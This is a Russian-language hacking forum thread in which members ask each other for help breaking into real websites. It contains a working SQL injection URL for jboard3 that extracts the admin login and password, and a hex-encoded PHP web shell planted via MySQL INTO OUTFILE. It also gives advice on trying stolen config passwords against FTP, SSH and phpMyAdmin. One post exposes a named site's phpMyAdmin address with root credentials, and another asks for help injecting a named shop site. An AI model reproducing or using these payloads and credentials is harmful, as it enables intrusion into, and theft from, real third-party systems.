Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Проблема с фильтрацией двойных ковычек в ксс...

    В общем проблема:
    И так:
    Так-то оно вроде все нормально, но мне нужно выйти за приделы value, если подставить двойную кавычку, она фильтруется через htmlspecialchars()...
    Пробовал и так:
    Но пока безуспешно... Подскажите что-нибудь.
     
  2. bluesky

    bluesky New Member

    Joined:
    26 Sep 2009
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    Есть скул на jboard3
    Code:
    export.php?t=php&n=5&c=0&r=40%20UNION%20SELECT%201,2,3,4,concat%28table_schema,0x2e,TABLE_NAME%29%20FROM%20INFORMATION_SCHEMA.TABLES%23
    Помогите выудить логин и пасс админа, структура таблиц вот:
    Code:
    `jb_admin`
    --
    
    CREATE TABLE `jb_admin` (
      `login` varchar(32) NOT NULL,
      `password` varchar(32) NOT NULL
    ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
     
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Как тебе уже сказали, подключиться удаленно к БД получится вряд ли. Ну тут есть пару вариантов:
    1) попробовать вытащенный пасс из конфига к админке с юзером: admin, adm, administrator и с юзером, который был вытащен из конфига.
    2) попробовать подключиться к FTP. пасс: из конфига. юзер: "админовские", из конфига который, из /etc/passwd
    3) попробовать найти на домене phpMyAdmin и с данным пассом подключиться к ней. Юзеров опять же пробовать "админовских", из конфига который, из /etc/passwd
    4) попробовать подключиться к SSH. Пароль из конфига. Юзеры: "админовские", root, из конфига, из /etc/passwd.

    P.S.: Если в /etc/passwd дохера юзеров (т.е. имя системного пользователя для каждого аккаунта на хостинге), то нет смысла пробовать пробить все! Тебе из /etc/passwd нужно имя пользователя-владельца, где ты нашел инклюд.

    bluesky На античате куча статей по SQL-иньекциям, советую почитать ;)

    Запрос тебе нужен такой:

    export.php?t=php&n=5&c=0&r=40+UNION+SELECT+1,2,3,4,concat(login,0x3a,password)+FROM+jb_admin--+

    Moriarty, ты не поставил комменатрий, без которого запрос может не обрезать и SQL-запрос вызовет ошибку. Ну и '::' нет смысла) А вдруг mq? Который обычно включен всегда. Правильнее захексить: 0x3a3a.
     
    #16303 Tigger, 10 Mar 2011
    Last edited: 10 Mar 2011
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Требуется помощь в заливке шелла через phpMyAdmin

    5.1.41-3ubuntu12.10:root@localhost:debian-linux-gnu

    file_priv=Y
    MQ=on
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ты не нуждаешся в помощи, только нужно найти путь к папке где есть права на заливку, что еще надо? :)
     
    _________________________
  6. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Перебрал более 30 папок, но такой не нашел.
    Сейчас пытаюсь залить через URL двойным запросом, но пока не очень получается.
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не получается.

    Кто возмется залить, скину линк в ПМ.
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    а если не нашел тогда чем поможет тебе двойной запрос? :)

    все равно прав не будет, тама скани директории сайта,реверсни IP, мб найдеш инклуд в соседних сайтах
     
    _________________________
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    там два сайта. один на php, второй на asp.
     
  10. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Делаю запрос:

    select 0x3c3f73797374656d28245f4745545b636d645d293f3e into outfile '/var/www/tmp/shell.php'

    Выдает

    Can't create/write to file '/var/www/ju/tmp/gen.php' (Errcode: 2)

    file_priv=Y
     
  11. KATYA

    KATYA Active Member

    Joined:
    9 Feb 2009
    Messages:
    236
    Likes Received:
    121
    Reputations:
    9
    Прав не хватает?
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Папка tmp доступна для записи всегда.
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    с чего ты взял что там есть данная папка? вот по адресу /tmp/ она всегда есть.. a в /var/www/ она может называтся как угодно temp, temporary..bla bla а может и не быть там
     
  14. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Попробуй сам залить шелл.


    http://www.japanupdate.com/phpmyadmin/

    root:b3777@p@du7@

    japanupdate:x:33:33::/var/www/ju/htdocs
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    удали..в приват надо было..ща все туда попрут
     
  16. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    206
    Likes Received:
    279
    Reputations:
    32
    +order+by+18446744073709551616+-- выводит без ошибки
    +order+by+18446744073709551615+-- выводит с ошибкой
    значит 18446744073709551616 столбцов? такое возможно?
     
  17. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    это хэксированная штука, т.е. скажем 18446744073709551616=version() или что-то другое, хотя такое не встречал, может там блайнд идет.
     
    #16317 noviyuser, 11 Mar 2011
    Last edited: 11 Mar 2011
  18. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    в какой таблице IPB можно узнать адрес сайта (напободие wp_options в wordpress)? поиск по мылу не увенчался успехом.
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    я ищу по названию тем в форуме...
     
    1 person likes this.
  20. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Привет.
    Если не трудно, помогите, пожалуйста, раскрутить.
    http://www.orlyba[...:::G00GLE:::...]or.co.il/catin.asp?productid=163%27&catid=31&Contact_02=No
     
    _________________________
Thread Status:
Not open for further replies.